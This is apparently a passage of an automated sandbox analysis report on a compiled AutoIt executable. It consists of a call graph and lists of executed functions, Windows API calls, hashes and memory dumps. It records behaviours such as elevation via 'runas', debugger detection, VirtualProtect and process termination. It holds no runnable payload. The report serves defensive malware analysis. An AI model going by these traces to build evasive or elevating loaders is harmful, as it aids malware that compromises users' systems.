111212->111190 111213->111204 111214->111200 111215->111211 111216->111212 111217 401078 111222 40708b 111217->111222 111219 40108c 111220 422d40 __cinit 67 API calls 111219->111220 111221 401096 111220->111221 111223 40709b __ftell_nolock 111222->111223 111224 407667 59 API calls 111223->111224 111225 407151 111224->111225 111226 404706 61 API calls 111225->111226 111227 40715a 111226->111227 111253 42050b 111227->111253 111230 407cab 59 API calls 111231 407173 111230->111231 111232 403f74 59 API calls 111231->111232 111233 407182 111232->111233 111234 407667 59 API calls 111233->111234 111235 40718b 111234->111235 111236 407d8c 59 API calls 111235->111236 111237 407194 RegOpenKeyExW 111236->111237 111238 43e8b1 RegQueryValueExW 111237->111238 111243 4071b6 Mailbox 111237->111243 111239 43e943 RegCloseKey 111238->111239 111240 43e8ce 111238->111240 111239->111243 111251 43e955 _wcscat Mailbox __wsetenvp 111239->111251 111241 420db6 Mailbox 59 API calls 111240->111241 111242 43e8e7 111241->111242 111244 40522e 59 API calls 111242->111244 111243->111219 111245 43e8f2 RegQueryValueExW 111244->111245 111246 43e90f 111245->111246 111248 43e929 111245->111248 111247 407bcc 59 API calls 111246->111247 111247->111248 111248->111239 111249 407de1 59 API calls 111249->111251 111250 403f74 59 API calls 111250->111251 111251->111243 111251->111249 111251->111250 111252 4079f2 59 API calls 111251->111252 111252->111251 111254 431940 __ftell_nolock 111253->111254 111255 420518 GetFullPathNameW 111254->111255 111256 42053a 111255->111256 111257 407bcc 59 API calls 111256->111257 111258 407165 111257->111258 111258->111230 111259 a75a3b 111260 a75a45 111259->111260 111264 a74f7c 111259->111264 111261 a751ae 111260->111261 111262 a75a4b CreateThread 111260->111262 111265 a75a59 RtlExitUserThread 111262->111265 111263 a74f88 111264->111263 111266 a75d20 2 API calls 111264->111266 111269 a75b1d 111265->111269 111268 a74f99 111266->111268 111270 a75d20 2 API calls 111269->111270 111271 a75b3c 111270->111271 111271->111271 111272 bf8400 111286 bf6000 111272->111286 111274 bf8493 111289 bf82f0 111274->111289 111292 bf94e0 GetPEB 111286->111292 111288 bf668b 111288->111274 111290 bf82f9 Sleep 111289->111290 111291 bf8307 111290->111291 111293 bf950a 111292->111293 111293->111288 111294 43fdfc 111310 40ab30 Mailbox _memmove 111294->111310 111296 45617e Mailbox 59 API calls 111303 40a057 111296->111303 111298 40b525 111426 469e4a 89 API calls 4 library calls 111298->111426 111301 4409e5 111431 469e4a 89 API calls 4 library calls 111301->111431 111302 440055 111425 469e4a 89 API calls 4 library calls 111302->111425 111306 40b475 111312 408047 59 API calls 111306->111312 111308 408047 59 API calls 111318 409f37 Mailbox 111308->111318 111309 440064 111310->111298 111310->111303 111310->111318 111321 407de1 59 API calls 111310->111321 111324 47bc6b 331 API calls 111310->111324 111327 40b2b6 111310->111327 111329 409ea0 331 API calls 111310->111329 111330 44086a 111310->111330 111332 440878 111310->111332 111334 44085c 111310->111334 111335 40b21c 111310->111335 111337 420db6 59 API calls Mailbox 111310->111337 111339 456e8f 59 API calls 111310->111339 111346 47445a 331 API calls 111310->111346 111347 47df37 111310->111347 111350 48241e 111310->111350 111363 47df23 111310->111363 111366 482295 111310->111366 111371 47e4d1 111310->111371 111377 47c2e0 111310->111377 111409 467956 111310->111409 111415 45617e 111310->111415 111420 409c90 59 API calls Mailbox 111310->111420 111424 47c193 85 API calls 2 library calls 111310->111424 111311 420db6 59 API calls Mailbox 111311->111318 111312->111303 111314 40b47a 111314->111301 111314->111302 111317 407667 59 API calls 111317->111318 111318->111302 111318->111303 111318->111306 111318->111308 111318->111311 111318->111314 111318->111317 111319 422d40 67 API calls __cinit 111318->111319 111320 456e8f 59 API calls 111318->111320 111322 4409d6 111318->111322 111326 40a55a 111318->111326 111418 40c8c0 331 API calls 2 library calls 111318->111418 111419 40b900 60 API calls Mailbox 111318->111419 111319->111318 111320->111318 111321->111310 111430 469e4a 89 API calls 4 library calls 111322->111430 111324->111310 111429 469e4a 89 API calls 4 library calls 111326->111429 111423 40f6a3 331 API calls 111327->111423 111329->111310 111427 409c90 59 API calls Mailbox 111330->111427 111428 469e4a 89 API calls 4 library calls 111332->111428 111334->111296 111334->111303 111421 409d3c 60 API calls Mailbox 111335->111421 111337->111310 111338 40b22d 111422 409d3c 60 API calls Mailbox 111338->111422 111339->111310 111346->111310 111432 47cadd 111347->111432 111349 47df47 111349->111310 111351 409837 84 API calls 111350->111351 111352 482436 111351->111352 111353 407667 59 API calls 111352->111353 111354 482444 111353->111354 111355 409b3c 59 API calls 111354->111355 111357 48244f 111355->111357 111356 482479 111522 409a3c 59 API calls Mailbox 111356->111522 111357->111356 111360 409837 84 API calls 111357->111360 111359 482485 Mailbox 111359->111310 111361 48246a 111360->111361 111362 40784b 59 API calls 111361->111362 111362->111356 111364 47cadd 130 API calls 111363->111364 111365 47df33 111364->111365 111365->111310 111523 45f401 111366->111523 111368 4822a1 111542 409a3c 59 API calls Mailbox 111368->111542 111370 4822bd Mailbox 111370->111310 111375 47e4e4 111371->111375 111372 409837 84 API calls 111373 47e521 111372->111373 111544 467729 111373->111544 111375->111372 111376 47e4f3 111375->111376 111376->111310 111378 407667 59 API calls 111377->111378 111379 47c2f4 111378->111379 111380 407667 59 API calls 111379->111380 111381 47c2fc 111380->111381 111382 407667 59 API calls 111381->111382 111383 47c304 111382->111383 111384 409837 84 API calls 111383->111384 111397 47c312 111384->111397 111385 47c528 Mailbox 111385->111310 111386 407bcc 59 API calls 111386->111397 111387 47c4fb 111387->111385 111587 409a3c 59 API calls Mailbox 111387->111587 111389 47c4e2 111391 407cab 59 API calls 111389->111391 111390 47c4fd 111395 407cab 59 API calls 111390->111395 111393 47c4ef 111391->111393 111392 408047 59 API calls 111392->111397 111399 407b2e 59 API calls 111393->111399 111394 407924 59 API calls 111394->111397 111396 47c50c 111395->111396 111400 407b2e 59 API calls 111396->111400 111397->111385 111397->111386 111397->111387 111397->111389 111397->111390 111397->111392 111397->111394 111398 407e4f 59 API calls 111397->111398 111401 407e4f 59 API calls 111397->111401 111406 409837 84 API calls 111397->111406 111407 407cab 59 API calls 111397->111407 111408 407b2e 59 API calls 111397->111408 111402 47c3a9 CharUpperBuffW 111398->111402 111399->111387 111400->111387 111403 47c469 CharUpperBuffW 111401->111403 111585 40843a 68 API calls 111402->111585 111586 40c5a7 69 API calls 2 library calls 111403->111586 111406->111397 111407->111397 111408->111397 111410 467962 111409->111410 111411 420db6 Mailbox 59 API calls 111410->111411 111412 467970 111411->111412 111413 46797e 111412->111413 111414 407667 59 API calls 111412->111414 111413->111310 111414->111413 111588 4560c0 111415->111588 111417 45618c 111417->111310 111418->111318 111419->111318 111420->111310 111421->111338 111422->111327 111423->111298 111424->111310 111425->111309 111426->111334 111427->111334 111428->111334 111429->111303 111430->111301 111431->111303 111433 409837 84 API calls 111432->111433 111434 47cb1a 111433->111434 111439 47cb61 Mailbox 111434->111439 111470 47d7a5 111434->111470 111436 47cf2e 111509 47d8c8 92 API calls Mailbox 111436->111509 111439->111349 111440 47cbb2 Mailbox 111440->111439 111443 409837 84 API calls 111440->111443 111457 47cdb9 111440->111457 111502 47fbce 59 API calls 2 library calls 111440->111502 111503 47cfdf 61 API calls 2 library calls 111440->111503 111441 47cf3d 111442 47cdc7 111441->111442 111447 47cf49 111441->111447 111483 47c96e 111442->111483 111443->111440 111447->111439 111449 47ce00 111498 420c08 111449->111498 111452 47ce33 111455 4092ce 59 API calls 111452->111455 111453 47ce1a 111504 469e4a 89 API calls 4 library calls 111453->111504 111458 47ce3f 111455->111458 111456 47ce25 GetCurrentProcess TerminateProcess 111456->111452 111457->111436 111457->111442 111459 409050 59 API calls 111458->111459 111460 47ce55 111459->111460 111468 47ce7c 111460->111468 111505 408d40 59 API calls Mailbox 111460->111505 111462 47cfa4 111462->111439 111466 47cfb8 FreeLibrary 111462->111466 111463 47ce6b 111506 47d649 107 API calls _free 111463->111506 111466->111439 111468->111462 111507 408d40 59 API calls Mailbox 111468->111507 111508 409d3c 60 API calls Mailbox 111468->111508 111510 47d649 107 API calls _free 111468->111510 111471 407e4f 59 API calls 111470->111471 111472 47d7c0 CharLowerBuffW 111471->111472 111511 45f167 111472->111511 111476 407667 59 API calls 111477 47d7f9 111476->111477 111478 40784b 59 API calls 111477->111478 111479 47d810 111478->111479 111481 407d2c 59 API calls 111479->111481 111480 47d858 Mailbox 111480->111440 111482 47d81c Mailbox 111481->111482 111482->111480 111518 47cfdf 61 API calls 2 library calls 111482->111518 111484 47c989 111483->111484 111488 47c9de 111483->111488 111485 420db6 Mailbox 59 API calls 111484->111485 111486 47c9ab 111485->111486 111487 420db6 Mailbox 59 API calls 111486->111487 111486->111488 111487->111486 111489 47da50 111488->111489 111490 47dc79 Mailbox 111489->111490 111494 47da73 _strcat _wcscpy __wsetenvp 111489->111494 111490->111449 111491 409b98 59 API calls 111491->111494 111492 409be6 59 API calls 111492->111494 111493 409b3c 59 API calls 111493->111494 111494->111490 111494->111491 111494->111492 111494->111493 111495 409837 84 API calls 111494->111495 111496 42571c 58 API calls __crtLCMapStringA_stat 111494->111496 111521 465887 61 API calls 2 library calls 111494->111521 111495->111494 111496->111494 111500 420c1d 111498->111500 111499 420cb5 VirtualProtect 111501 420c83 111499->111501 111500->111499 111500->111501 111501->111452 111501->111453 111502->111440 111503->111440 111504->111456 111505->111463 111506->111468 111507->111468 111508->111468 111509->111441 111510->111468 111512 45f192 __wsetenvp 111511->111512 111513 45f1c7 111512->111513 111514 45f278 111512->111514 111517 45f1d1 111512->111517 111513->111517 111519 4078c4 61 API calls 111513->111519 111514->111517 111520 4078c4 61 API calls 111514->111520 111517->111476 111517->111482 111518->111480 111519->111513 111520->111514 111521->111494 111522->111359 111524 407667 59 API calls 111523->111524 111525 45f414 111524->111525 111526 407a16 59 API calls 111525->111526 111527 45f428 111526->111527 111528 45f167 61 API calls 111527->111528 111531 45f44a 111527->111531 111529 45f444 111528->111529 111529->111531 111532 40784b 59 API calls 111529->111532 111530 45f167 61 API calls 111530->111531 111531->111530 111533 40784b 59 API calls 111531->111533 111534 45f4c4 111531->111534 111536 407b2e 59 API calls 111531->111536 111532->111531 111533->111531 111535 40784b 59 API calls 111534->111535 111537 45f4dd 111535->111537 111536->111531 111538 407b2e 59 API calls 111537->111538 111539 45f4e9 111538->111539 111541 45f4f8 Mailbox 111539->111541 111543 407f77 59 API calls 2 library calls 111539->111543 111541->111368 111542->111370 111543->111541 111545 467736 111544->111545 111546 420db6 Mailbox 59 API calls 111545->111546 111547 46773d 111546->111547 111550 465b7a 111547->111550 111549 467780 Mailbox 111549->111376 111551 407e4f 59 API calls 111550->111551 111552 465b8d CharLowerBuffW 111551->111552 111554 465ba0 111552->111554 111553 465baa _memset Mailbox 111553->111549 111554->111553 111555 465bda 111554->111555 111556 4079f2 59 API calls 111554->111556 111557 465bec 111555->111557 111558 4079f2 59 API calls 111555->111558 111556->111554 111559 420db6 Mailbox 59 API calls 111557->111559 111558->111557 111563 465c1a 111559->111563 111562 465c78 111562->111553 111565 420db6 Mailbox 59 API calls 111562->111565 111564 465c39 111563->111564 111583 465ab6 59 API calls 111563->111583 111568 465cd7 111564->111568 111566 465c92 111565->111566 111567 420db6 Mailbox 59 API calls 111566->111567 111567->111553 111569 407667 59 API calls 111568->111569 111570 465d09 111569->111570 111571 407667 59 API calls 111570->111571 111572 465d12 111571->111572 111573 407667 59 API calls 111572->111573 111580 465d1b _wcscmp 111573->111580 111574 407bcc 59 API calls 111574->111580 111575 465ff0 Mailbox 111575->111562 111576 423606 GetStringTypeW 111576->111580 111578 42358a 59 API calls 111578->111580 111579 465cd7 60 API calls 111579->111580 111580->111574 111580->111575 111580->111576 111580->111578 111580->111579 111581 407924 59 API calls 111580->111581 111582 408047 59 API calls 111580->111582 111584 42362c GetStringTypeW _iswctype 111580->111584 111581->111580 111582->111580 111583->111563 111584->111580 111585->111397 111586->111397 111587->111385 111589 4560e8 111588->111589 111590 4560cb 111588->111590 111589->111417 111590->111589 111592 4560ab 59 API calls Mailbox 111590->111592 111592->111590

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00A9CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: d$w
                                                                                                                                                  • API String ID: 0-2400632791
                                                                                                                                                  • Opcode ID: 9bccdce21a806821f3e2059ebdda32f6cbc0128d7b988e095f68c1ad0ccd8c07
                                                                                                                                                  • Instruction ID: c0e82edb61b24c5a5ef0a2c537decbb7b60fab0d060e4391492348d88af8c680
                                                                                                                                                  • Opcode Fuzzy Hash: 9bccdce21a806821f3e2059ebdda32f6cbc0128d7b988e095f68c1ad0ccd8c07
                                                                                                                                                  • Instruction Fuzzy Hash: C9C18634B5CB80AFDF3597689D09B763AF46BA1B70F9D0646F5468A0F3E7109C04D622
                                                                                                                                                  Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                                                                                    • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                                                                                    • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                                                                                    • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                                                                                    • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                                                                                    • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                                                                                    • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                                                                                    • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                                                                                    • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                                                                                    • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                                                                                    • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                                                                                    • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                                                                                    • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                                                                                    • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                  • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                                                                                                  • API String ID: 529118366-2806069697
                                                                                                                                                  • Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                                                                                                  • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                                                                                                  • Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                                                                                                  • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D
                                                                                                                                                  Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2032 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2037 404a06 2032->2037 2038 404b0b-404b0d 2032->2038 2040 404a09-404a0e 2037->2040 2039 43d767-43d773 2038->2039 2043 43d774-43d778 2039->2043 2041 404b12-404b13 2040->2041 2042 404a14 2040->2042 2046 404a15-404a4c call 407d2c call 407726 2041->2046 2042->2046 2044 43d77b-43d787 2043->2044 2045 43d77a 2043->2045 2044->2043 2047 43d789-43d78e 2044->2047 2045->2044 2055 404a52-404a53 2046->2055 2056 43d864-43d867 2046->2056 2047->2040 2049 43d794-43d79b 2047->2049 2049->2039 2051 43d79d 2049->2051 2054 43d7a2-43d7a5 2051->2054 2057 404a93-404aaa GetCurrentProcess IsWow64Process 2054->2057 2058 43d7ab-43d7c9 2054->2058 2055->2054 2059 404a59-404a64 2055->2059 2060 43d880-43d884 2056->2060 2061 43d869 2056->2061 2068 404aac 2057->2068 2069 404aaf-404ac0 2057->2069 2058->2057 2062 43d7cf-43d7d5 2058->2062 2063 43d7ea-43d7f0 2059->2063 2064 404a6a-404a6c 2059->2064 2066 43d886-43d88f 2060->2066 2067 43d86f-43d878 2060->2067 2065 43d86c 2061->2065 2070 43d7d7-43d7da 2062->2070 2071 43d7df-43d7e5 2062->2071 2074 43d7f2-43d7f5 2063->2074 2075 43d7fa-43d800 2063->2075 2072 404a72-404a75 2064->2072 2073 43d805-43d811 2064->2073 2065->2067 2066->2065 2076 43d891-43d894 2066->2076 2067->2060 2068->2069 2077 404ac2-404ad2 call 404b37 2069->2077 2078 404b2b-404b35 GetSystemInfo 2069->2078 2070->2057 2071->2057 2080 43d831-43d834 2072->2080 2081 404a7b-404a8a 2072->2081 2083 43d813-43d816 2073->2083 2084 43d81b-43d821 2073->2084 2074->2057 2075->2057 2076->2067 2089 404ad4-404ae1 call 404b37 2077->2089 2090 404b1f-404b29 GetSystemInfo 2077->2090 2082 404af8-404b08 2078->2082 2080->2057 2086 43d83a-43d84f 2080->2086 2087 404a90 2081->2087 2088 43d826-43d82c 2081->2088 2083->2057 2084->2057 2091 43d851-43d854 2086->2091 2092 43d859-43d85f 2086->2092 2087->2057 2088->2057 2097 404ae3-404ae7 GetNativeSystemInfo 2089->2097 2098 404b18-404b1d 2089->2098 2094 404ae9-404aed 2090->2094 2091->2057 2092->2057 2094->2082 2096 404aef-404af2 FreeLibrary 2094->2096 2096->2082 2097->2094 2098->2097
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1986165174-0
                                                                                                                                                  • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                                                                                  • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                                                                                                  • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                                                                                  • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E
                                                                                                                                                  Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2099 404e89-404ea1 CreateStreamOnHGlobal 2100 404ec1-404ec6 2099->2100 2101 404ea3-404eba FindResourceExW 2099->2101 2102 43d933-43d942 LoadResource 2101->2102 2103 404ec0 2101->2103 2102->2103 2104 43d948-43d956 SizeofResource 2102->2104 2103->2100 2104->2103 2105 43d95c-43d967 LockResource 2104->2105 2105->2103 2106 43d96d-43d98b 2105->2106 2106->2103
                                                                                                                                                  APIs
                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                                                                                                  • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                  • String ID: SCRIPT
                                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                                  • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                                                                                  • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                                                                                                                  • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                                                                                  • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                                                                                                                  Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                  • String ID: pbL$%I
                                                                                                                                                  • API String ID: 3964851224-1578263234
                                                                                                                                                  • Opcode ID: f44e8e321818ef44d85c2bb27a672c3eaf89e9879f2da58d0c5687bc8dfc2d35
                                                                                                                                                  • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                                                                                                  • Opcode Fuzzy Hash: f44e8e321818ef44d85c2bb27a672c3eaf89e9879f2da58d0c5687bc8dfc2d35
                                                                                                                                                  • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                                                                                                  Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
